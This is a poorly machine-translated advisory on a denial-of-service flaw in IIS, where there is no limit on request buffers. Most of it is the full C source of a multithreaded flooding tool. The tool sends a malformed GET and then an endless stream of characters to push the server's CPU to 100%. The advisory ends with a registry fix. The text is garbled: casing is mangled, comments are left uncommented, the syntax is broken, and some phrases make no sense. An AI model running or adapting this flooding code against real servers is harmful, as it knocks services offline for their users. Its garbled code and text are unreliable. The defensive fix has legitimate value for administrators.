Resolve the IIS Web server DOS
Vulnerability Description:
By default, IIS is vulnerable to denial of service attacks. If a key called "MaxClientRequestBuffer" has not been created in the registry, this NT system
The attacks of the EC usually work. The "MaxClientRequestBuffer" key is used to set the amount of input that IIS is allowed to accept. If "MaxClientRequestBuffer"
Set to 256 (bytes), the attacker requests IIS to be limited to 256 bytes by entering a large number of characters. The default setting of the system does not limit this, so use
The following procedure. You can easily implement a DOS attack on IIS server:
#include <stdio.h>
#include <windows.h>
#define Max_thread 666
void CNG ();
Char *server;
Char *buffer;
int port;
int counter = 0;
int current_threads = 0;
int main (int argc, char **argv)
{
WORD Tequila;
Wsadata data;
int p;
DWORD Tid;
HANDLE hthread[2000];
This code is as and sucks as it is. Won ' t exit correctly and a lot
Of the other fun things.
That I didn ' t want to take of the time. So just CTRL + C out of the
Code.
Load up Cnghack.exe 3 charm.
printf ("CNG IIS dos.\nmarc@eeye.com\nhttp://www.eeye.com\n\" for my
Beloved.\ "\ n");
if (argc<2) {
printf ("Usage:%s [Server] [port]\n", argv[0]);
Exit (1);
}
Buffer=malloc (17500);
memset (buffer, ' A ', strlen (buffer));
SERVER=ARGV[1];
Port=atoi (argv[2]);
Tequila = Makeword (1, 1);
printf ("Attempting to start Winsock ...") ");
if ((WSAStartup (Tequila, &data))!=0) {
printf ("Failed to start winsock.\n");
Exit (1);
}
else{
printf ("Started winsock.\n\n");
}
Counter = 0;
for (p = 0; p < max_thread; ++p) {
Hthread[counter] = CreateThread (0,
0,
(Lpthread_start_routine) CNG,
(void *) ++counter,
0,
&tid);
}
Sleep (250);
while (current_threads)
Sleep (250);
Counter = 0;
printf ("terminated threads.\n");
while (Counter < Max_thread)
{
TerminateThread (Hthread[counter], 0);
++counter;
}
WSACleanup ();
return 0;
}
void CNG ()
{
int sockfd=0, p;
struct sockaddr_in dstsain;
Char getkilled[]= "get/http/\r\n";
int die=1;
printf ("entered cng\n");
++current_threads;
dstsain.sin_family = af_inet;
Dstsain.sin_port = htons ((u_short) port);
DSTSAIN.SIN_ADDR.S_ADDR=INET_ADDR (server);
if ((SOCKFD = socket (af_inet, sock_stream, 0)) < 0) {
printf ("Failed to create socket\n");
--current_threads;
Return
}
if (!connect (SOCKFD, struct sockaddr *) &dstsain, sizeof (Dstsain)))
{
P=send (Sockfd,getkilled,strlen (getkilled), 0);
printf ("Step 1:%i\n", p);
for (;;) {
P=send (Sockfd,buffer,strlen (buffer), 0);
printf ("P:%i\n", p);
Put in some code to check if send =-1 more then X times we drop
The loop and exit the thread
Bla bla bla I love the dirtiness of concept code.
}
}
--current_threads;
printf ("exited cng\n");
Return
}
CNGHACK.C works by doing the following:
Connects to example.com
Sends:get/http/[return][buffer]
Where:
[Return] are just an \ r \ n
[Buffer] is a never ending stream of a ' s
The attack result will result in the NT system's CPU occupancy rate reaching 100%
Solution
Run Regedt32.exe
In: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W3SVC\Parameters
Add a value:
Value Name:maxclientrequestbuffer
Data Type:reg_dword
Set to Decimal
The specified value is set to the maximum length of the URL that you want to allow for IIS to accept.
CNNs is set to 256
